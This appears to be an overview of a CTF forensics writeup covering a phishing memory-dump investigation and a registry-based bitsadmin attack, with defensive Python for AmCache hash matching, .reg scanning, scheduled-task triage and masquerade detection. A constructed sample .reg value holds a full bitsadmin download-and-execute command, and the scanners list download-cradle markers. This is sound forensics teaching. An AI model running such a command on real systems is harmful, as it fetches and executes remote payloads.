Overview
This writeup documents my approach to solving two complex forensics challenges from QnQSec CTF 2025.
The challenges required a combination of:
- Windows memory forensics with Volatility 3
- Email forensics and phishing incident response
- Windows registry analysis and artifact examination
- Malware analysis and behavioral investigation
- AmCache forensics for execution tracking
- Scheduled task persistence identification
- Command & Control infrastructure analysis
- Threat intelligence with VirusTotal
2 challenges solved, 8 questions answered, 10+ tools used, 100% success rate
Challenges
Masks
A comprehensive memory forensics challenge investigating a phishing incident. Analyze a memory dump to answer 8 questions tracing the complete attack chain from email delivery to persistence establishment.
Key Findings:
- OUTLOOK.EXE identified as the process that handled the malicious attachment
- OST file carved from memory and parsed to build the email timeline
- Exploitation of a CVE delivered via the RAR attachment
- AmCache SHA-1 recovered for the payload and correlated to its SHA-256 via threat intelligence
- Shellcode download URL identification
- C2 server extraction from process memory
- Scheduled task persistence mechanism discovery
- Complete attack chain reconstruction
Execution
A registry forensics challenge involving malicious command identification and malware analysis. Investigate a .reg file to uncover a Living Off The Land (LOTL) attack that abuses the Windows bitsadmin utility to download and run a payload.
Key Findings:
- Malicious bitsadmin command in registry
- GitHub used as malware hosting platform
- File masquerading (described as a polyglot): an EXE served under a .jpg name, identified from its magic bytes rather than its extension
- Living Off The Land (LOTL) technique abuse
- Immediate download and execution pattern
- C2 infrastructure identification via VirusTotal
- MITRE ATT&CK technique mapping
- Complete IOC extraction
Tools & Technologies
Memory Forensics
- Volatility 3
- windows.pslist
- windows.filescan
- windows.dumpfiles
- windows.memmap
- windows.amcache
Email Forensics
- pffexport
- OST/PST Analysis
- Email Timeline Analysis
Registry & File Analysis
- Notepad++
- strings utility
- file command
- sha256sum
- Registry Analysis
Threat Intelligence
- VirusTotal
- Behavior Analysis
- Hash Lookups
- OSINT Research
Key Takeaways
Multi-Layered Analysis
Memory forensics requires analyzing multiple artifact types - process memory, registry hives, scheduled tasks, and file system metadata to reconstruct attack chains.
AmCache is Critical
When the file itself cannot be carved from memory, the AmCache hive still records a SHA-1 for every executable that ran. Two details matter when matching it: the hash is stored as a FileId with a "0000" prefix in front of the 40 hex digits, and Windows computes it over at most the first 31,457,280 bytes (30 MiB) of the file, so a full-file SHA-1 of a large binary will not match. The SHA-1 can then be looked up on threat intelligence platforms to recover the SHA-256, file name and behaviour report.
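As an added example (not code from the original writeup), the helper below reproduces the AmCache-style SHA-1 so a FileId pulled from AmCache.hve (for instance via Volatility 3's windows.amcache output) can be matched against a recovered sample before or instead of a VirusTotal lookup. The 30 MiB limit and the "0000" prefix are the documented AmCache behaviour; the sample bytes are constructed for the example.

```python
"""Match an AmCache FileId against a file's content.

AmCache stores SHA-1 as "0000" + 40 hex digits, and Windows only hashes the
first 31,457,280 bytes (30 MiB) of the file, so a naive full-file sha1sum of a
large binary will never match the hive. These helpers reproduce that behaviour.
"""
import hashlib

AMCACHE_HASH_LIMIT = 31_457_280  # bytes Windows actually feeds into SHA-1 (30 MiB)
AMCACHE_FILEID_PREFIX = "0000"


def amcache_sha1(data: bytes) -> str:
    """SHA-1 exactly as AmCache would record it: over at most the first 30 MiB."""
    return hashlib.sha1(data[:AMCACHE_HASH_LIMIT]).hexdigest()


def amcache_sha1_file(path: str) -> str:
    """Streaming variant for on-disk samples, stopping at the 30 MiB limit."""
    h = hashlib.sha1()
    remaining = AMCACHE_HASH_LIMIT
    with open(path, "rb") as fh:
        while remaining > 0:
            chunk = fh.read(min(1 << 20, remaining))
            if not chunk:
                break
            h.update(chunk)
            remaining -= len(chunk)
    return h.hexdigest()


def normalize_file_id(file_id: str) -> str:
    """Strip the '0000' prefix AmCache prepends to the SHA-1 and lowercase it."""
    fid = file_id.strip().lower()
    if len(fid) == 44 and fid.startswith(AMCACHE_FILEID_PREFIX):
        fid = fid[len(AMCACHE_FILEID_PREFIX):]
    return fid


def matches_amcache(file_id: str, data: bytes) -> bool:
    """True if the hive's FileId corresponds to this file content."""
    return normalize_file_id(file_id) == amcache_sha1(data)


if __name__ == "__main__":
    # Constructed sample, not a real binary from the challenge.
    sample = b"MZ" + b"\x00" * 62 + b"constructed sample payload"
    file_id = AMCACHE_FILEID_PREFIX + amcache_sha1(sample).upper()  # what the hive shows
    print(file_id, matches_amcache(file_id, sample))
```

The same normalisation is what you want before pasting the hash into VirusTotal: the platform will not find "0000..." prefixed strings.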
LOTL Techniques
Attackers increasingly abuse legitimate, signed Windows utilities such as bitsadmin to download and launch payloads, blending malicious activity with normal system operations and sidestepping controls that only look for unknown binaries.
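To make the Execution challenge's finding reproducible, here is an added example (not the writeup's own code) that parses an exported .reg file, flags values that invoke download-capable LOLBins such as bitsadmin, and extracts the URL, the local drop path and whether the command chains straight into execution. The registry key, value names and the GitHub URL in the sample are constructed for this example and are not the challenge's real IOCs.

```python
"""Scan a .reg export for LOLBin download-and-execute commands and pull IOCs."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Constructed sample .reg text for this example (not the challenge's real IOCs).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"Updater"="cmd.exe /c bitsadmin /transfer job /download /priority high https://raw.githubusercontent.com/example/repo/main/photo.jpg %TEMP%\\photo.jpg && start %TEMP%\\photo.jpg"
'''

VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\b", re.I)
# Signed Windows binaries commonly abused to fetch payloads (T1197 / T1105).
LOLBIN_RE = re.compile(r"\b(bitsadmin|certutil|mshta|regsvr32)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


@dataclass
class Finding:
    key: str
    value_name: str
    command: str
    lolbin: str
    url: Optional[str]
    dest: Optional[str]
    executes_download: bool
    autorun: bool


def _unescape(s: str) -> str:
    # .reg exports escape backslashes and quotes inside REG_SZ data.
    return s.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value_name, data) for every REG_SZ value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line) if key else None
        if not m:
            continue
        name = _unescape(m.group(1)) if m.group(1) is not None else "(Default)"
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):  # string values only; hex: is skipped
            yield key, name, _unescape(data[1:-1])


def scan_reg(text: str) -> List[Finding]:
    """Return one Finding per value that calls a download-capable LOLBin."""
    findings = []
    for key, name, data in parse_reg(text):
        m = LOLBIN_RE.search(data)
        if not m:
            continue
        url_m = URL_RE.search(data)
        url = url_m.group(0) if url_m else None
        dest, executes = None, False
        if url_m:
            rest = data[url_m.end():].split()
            # bitsadmin /transfer <job> [flags] <remote url> <local path>
            if m.group(1).lower() == "bitsadmin" and rest:
                dest = rest[0]
            # a chained operator or 'start' right after the download = immediate execution
            executes = any(tok in ("&&", "&", "|") or tok.lower() == "start" for tok in rest)
        findings.append(Finding(key, name, data, m.group(1).lower(), url, dest,
                                executes, bool(AUTORUN_KEY_RE.search(key))))
    return findings


if __name__ == "__main__":
    for f in scan_reg(SAMPLE_REG):
        print(f"{f.key}\\{f.value_name}: {f.lolbin} -> {f.url} -> {f.dest} "
              f"(executes={f.executes_download}, autorun={f.autorun})")
```

The extracted URL host and the drop path are the IOCs you would pivot on next (VirusTotal for the URL and the fetched file's hash, then the host's other resolutions for C2 infrastructure).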
Persistence Evolution
Persistence is not limited to the Run keys: in Masks the foothold was a scheduled task, so persistence hunting has to cover the task store (the XML files under C:\Windows\System32\Tasks and the TaskCache keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule) as well as the classic registry autoruns.
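As an added example (not from the original writeup), the following triages scheduled task XML definitions of the kind found under C:\Windows\System32\Tasks, flagging tasks whose action runs from a user-writable path, that are hidden, that request elevation, or whose arguments look like a download cradle. Both task definitions are constructed for the example; the path and binary name are assumptions, not the challenge's real persistence artefact.

```python
"""Triage Windows scheduled task XML for persistence indicators (T1053.005)."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a normal installer rarely schedules binaries from.
USER_WRITABLE_RE = re.compile(
    r"(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\|\\Downloads\\|%(TEMP|TMP|APPDATA|LOCALAPPDATA)%)",
    re.I)
# Typical download-cradle / obfuscation markers in arguments.
SUSPICIOUS_ARGS_RE = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|bitsadmin|/transfer|DownloadString|DownloadFile|\bIEX\b|mshta|certutil)",
    re.I)
# Names of core Windows binaries that should only live under \Windows\.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}

# Constructed task definitions for this example (real files are UTF-16 on disk;
# open them with encoding="utf-16" before passing the text here).
SUSPICIOUS_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>victim-pc\victim</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\victim\AppData\Roaming\Update\svchost.exe</Command>
      <Arguments>-silent</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command>
    <Arguments>/check</Arguments></Exec></Actions>
</Task>"""


def analyze_task(xml_text: str) -> Dict[str, object]:
    """Return the task's triggers, commands and a list of persistence red flags."""
    # ElementTree rejects a UTF-16 declaration on an already-decoded str, so drop it.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)

    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [c.tag.split("}")[-1] for c in trig]
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).lower() == "true"
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS)

    commands, flags = [], []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        commands.append((cmd, args))
        if USER_WRITABLE_RE.search(cmd):
            flags.append("exec_from_user_writable_path")
        if SUSPICIOUS_ARGS_RE.search(args) or SUSPICIOUS_ARGS_RE.search(cmd):
            flags.append("suspicious_arguments")
        base = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base in SYSTEM_NAMES and "\\windows\\" not in cmd.lower():
            flags.append("system_binary_name_outside_windows_dir")
    if hidden:
        flags.append("hidden_task")
    if run_level.lower() == "highestavailable":
        flags.append("highest_run_level")

    return {"triggers": triggers, "commands": commands, "flags": flags,
            "suspicious": bool(flags)}


if __name__ == "__main__":
    for name, xml in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, analyze_task(xml))
```

Run it over every file under the Tasks directory (or over the XML extracted from the memory image) and review anything with a non-empty flag list; a LogonTrigger firing a binary out of AppData is the pattern to expect from a phishing foothold.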
File Masquerading
Never trust file extensions: identify a file by its magic bytes (the `file` command, or a check for the MZ/PE header) because attackers disguise executables as images to slip past filters that only look at the name.
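Here is an added example (not the writeup's own code) of the extension-versus-content check behind the "EXE disguised as JPG" finding: it identifies the real type from the leading bytes, following the e_lfanew pointer to confirm a genuine PE signature rather than trusting "MZ" alone, and reports a masquerade when the extension claims something else. The minimal PE header is constructed for the example and is not a real binary.

```python
"""Detect file-type masquerading (T1036) by comparing magic bytes to the extension."""
import os
import struct
from typing import Dict, Optional

# Leading-byte signatures for the formats a phishing payload tends to pose as.
SIGNATURES = {
    "JPEG": b"\xff\xd8\xff",
    "PNG": b"\x89PNG\r\n\x1a\n",
    "GIF": b"GIF8",
    "PDF": b"%PDF-",
    "ZIP": b"PK\x03\x04",
    "RAR": b"Rar!\x1a\x07",  # common prefix of the RAR4 and RAR5 markers
}

EXT_TO_TYPE = {
    ".jpg": "JPEG", ".jpeg": "JPEG", ".png": "PNG", ".gif": "GIF", ".pdf": "PDF",
    ".zip": "ZIP", ".rar": "RAR", ".exe": "PE", ".dll": "PE", ".scr": "PE",
}


def identify(data: bytes) -> str:
    """Return the format implied by the file's content, not its name."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        # e_lfanew at offset 0x3C points at the "PE\0\0" signature in a real PE file.
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "PE"
        return "MZ-DOS"  # MZ stub without a PE header (old DOS binary or damaged file)
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def check_masquerade(filename: str, data: bytes) -> Dict[str, Optional[str]]:
    """Flag a file whose extension claims one format while the bytes say another."""
    ext = os.path.splitext(filename)[1].lower()
    claimed = EXT_TO_TYPE.get(ext)
    actual = identify(data)
    return {
        "file": filename,
        "claimed": claimed,
        "actual": actual,
        "masquerade": claimed is not None and actual != claimed,
    }


def build_fake_pe() -> bytes:
    """Constructed minimal PE header for the example (not an executable program)."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr) + b"\x00" * 32


if __name__ == "__main__":
    print(check_masquerade("photo.jpg", build_fake_pe()))
    print(check_masquerade("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

This is the same judgement `file` makes; the point of doing it in code is to run it over every dropped file in a triage directory and get a list of mismatches rather than eyeballing one.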
Threat Intel Integration
Integrating VirusTotal and other threat intelligence platforms accelerates analysis by providing behavior data, network IOCs, and malware family attribution.
MITRE ATT&CK Techniques Identified
Initial Access
- T1566.001 - Phishing: Spearphishing Attachment (malicious email attachment)
Execution
- T1204.002 - User Execution: Malicious File
- T1059 - Command and Scripting Interpreter (the bitsadmin command line)
Persistence
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion
- T1197 - BITS Jobs (bitsadmin /transfer)
- T1036 - Masquerading (EXE disguised as a JPG)
Command & Control
- T1071.001 - Application Layer Protocol: Web Protocols (HTTP/HTTPS C2)
- T1105 - Ingress Tool Transfer (shellcode and payload download)
Want to Learn More?
Check out the detailed writeups for step-by-step walkthroughs of each challenge.